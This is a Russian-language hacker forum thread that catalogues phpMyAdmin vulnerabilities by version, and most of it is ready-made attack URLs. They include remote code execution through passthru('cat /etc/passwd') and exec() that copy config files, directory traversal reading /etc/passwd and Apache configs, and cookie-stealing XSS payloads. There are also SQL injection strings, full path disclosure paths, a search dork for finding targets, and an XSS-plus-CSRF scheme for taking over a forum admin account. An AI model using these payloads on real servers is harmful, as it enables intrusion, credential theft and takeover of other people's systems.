![]() |
[ Обзор уязвимостей phpMyAdmin ]
Vulnerability
2.2.0rc3 http://victim/phpmyadmin/tbl_copy.php?db=test&table=haxor&new_name=test.hax or2&strCopyTableOK=".passthru('cat%20/etc/passwd')." Эксплоит дает выполнение произвольного кода. 2.3.2 http://target.com/phpMyAdmin/tbl_properties_structure.php?lang=<SQL INJECTION> SQL-injection 2.5.* phpMyAdmin 2.5.7 Remote code injection Exploit Эксплоит дает выполнение произвольного кода. 2.5.5-pl1 and prior http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00 Эксплоит дает чтение файла / выполнение произвольного кода. 2.6.4-pl1 phpMyAdmin 2.6.4-pl1 Remote Directory Traversal Exploit Эксплоит дает чтение любого фала. HTML-Exploit: Код HTML:
<CENTER> 2.7.0 http://victim/phpmyadmin/server_privileges.php?server=1&checkprivs=' http://victim/phpmyadmin/server_privileges.php?server=1&hostname='&username =1&dbname=1&tablename=1 SQL-injection 2.11.2 SQL-injection + XSS Код:
12 ноября, 2007other: http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00 http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00 http://www.example.com/phpMyAdmin/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3 http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No XSS (Cross-site Scripting) : 2.6.0-pl2 and prior http://[target]/[phpMyAdmin_directory]/main.php?"><script>alert(document.cookie)</script></ http://[target]/[phpMyAdmin_directory]/read_dump .php?sql_query=set%20@1=1&zero_rows=<script>alert( document.cookie)</script> prior to 2.6.2-rc1 http://[target]/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lan g=en-iso-8859-1&convcharset=\"><sc ript>alert(document.cookie)</script> http://[target]/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lan g=en-iso-8859-1&convcharset=\"><h1>XSS</h1> 2.8.0.1 http://example.com/?convcharset=%22%20STYLE=%22background-image:%20url(javascript:alert('XSS'))%22%20r=%22 index.php?set_theme=%3Cscript%3Ealert('Powered By Expaethitec');%3C/script%3E 2.9.x http://site.com/phpmyadmin/sql.php?db=information_schema& token=your_token&goto=db_details_structure.php&tab le=CHARACTER_SETS&pos=[xss] other: Код:
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]Full path disclosure : /scripts/check_lang.php /themes/darkblue_orange/layout.inc.php /index.php?lang[]= /index.php?target[]= /index.php?db[]= /index.php?goto[]= /left.php?server[]= /index.php?table[]= /server_databases.php?token=your_token&sort_by=" /index.php?db=information_schema&token=your_token&t bl_group[]= /db_printview.php?db=" /sql.php?back[]= libraries/string.lib.php libraries/storage_engines.lib.php libraries/sqlparser.lib.php libraries/sql_query_form.lib.php libraries/select_theme.lib.php libraries/select_lang.lib.php libraries/relation_cleanup.lib.php libraries/left_header.inc.php libraries/import.lib.php libraries/header_meta_style.inc.php libraries/grab_globals.lib.php libraries/get_foreign.lib.php (get_foreign.lib.php?field=foo&foreigners[foo]=foo) libraries/display_tbl_links.lib.php (display_tbl_links.lib.php?doWriteModifyAt=left&ed it_url=foo) libraries/display_import.lib.php libraries/display_export.lib.php libraries/display_create_table.lib.php libraries/display_create_database.lib.php libraries/db_table_exists.lib.php libraries/database_interface.lib.php libraries/common.lib.php libraries/check_user_privileges.lib.php libraries/charset_conversion.lib.php (charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true) libraries/sqlvalidator.lib.php (libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE) libraries/import/sql.php libraries/fpdf/ufpdf.php libraries/auth/cookie.auth.lib.php (libraries/auth/cookie.auth.lib.php?coming_from_common=true) dork: Код:
inurl:main.php phpMyAdminFiles locations Код:
/phpm/phpMyAdmin security announcement |
SQL injection (Delayed Cross Site Request Forgery) <=v2.11.5
Цитата:
У нас имеется сайт на котором стоит phpmyadmin (кстати не особо важно даже где, главное чтоб стоял и админ в него заходил), форум (для примера ipb) и скрипт подверженный активной xss (для примера возьмём теоретическую активку в пм ipb). Отправляем админу кодес с xss (важно знать префикс используемый на форуме). Кодес: PHP код:
4 - админская группа 31337 - наш id на форуме После "заражения" xss'кой админа остаётся только ждать когда он зайдёт в phpmyadmin. Там уже выполняемый админом sql запрос перепишется и сделает нас админом форума (при данном значении параметра sql_query). Для беспалевности можно "поиграть" с параметром expires. PS на данный момент уязвимости подвержены практически все пхпмайадмины (не успели обновиться, бгг)) |
еще пару XSS, в версии 2.6.1 работают, последние версии не уязвимы:
Код:
http://site/phpMyAdmin/index.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script>Код:
http://site/phpMyAdmin/calendar.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script>register globals и magic qoutes неважны Код:
http://localhost/Tools/phpMyAdmin/mult_submits.inc.php?submit_mult=1&what=1&strDoYouReally=<script>alert(5555)</script>поидее и в последних версиях этот скрипт уязвим, но он перенесен в libraries и немного изменен, в 2.11.5 эксплуатируется так: Код:
http://localhost/Tools/phpMyAdmin/libraries/mult_submits.inc.php?submit_mult=1&what="><script>alert(5555)</script> |
It is a variable that was not cleaned in a way, allowing you to inject SQL code into the cookie. Here is a example of a small vulnerable php script.
PHP код:
You can now use a thing such the extention for firefox called Cookie Editor, and modify the cookie, you can also do this with javascript. You then edit the cookie's value, it would have been something like "12", but after editing and adding sql code to it, it would be something like "-1 UNION ALL SELECT USER(), NULL FROM mysql.user--". That will change the query, and display the user connected to the database, instead of the name of the user stored in the database. That will result in the following being echo'd; "Hello root@localhost". (c) h4cky0u |
Vulnerable:
Код:
Typo3 phpMyAdmin 3.2 Код:
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]Решение: Upgrade to phpMyAdmin 2.11.9.1 or newer. Not Vulnerable: Код:
Typo3 phpMyAdmin 3.3 |
бага разобрана тут
|
Цитата:
|
phpMyAdmin 3.1.0 (XSRF) SQL Injection Vulnerability
______________________ http://www.milw0rm.com/exploits/7382 |
2.10.0.2
XSS
[CODE] Код:
http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID]Код:
http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID]Код:
http://[server]/server_privileges.php?token=[SID]&username=[XSS]Код:
http://[server]/server_privileges.php?token=[SID]&username=[XSS]Код:
http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS]Код:
http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS]Код:
http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]&Код:
http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]&Код:
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&Код:
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&Код:
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&Код:
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&Код:
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0[XSS]&session_max_rows=30& |
Цитата:
Работает на мускуле 4 На 5 - не работает. По крайней мере у меня. ТОлько что протестил.) (хорошо что там где надо стоит 4)))) |
| Время: 11:25 |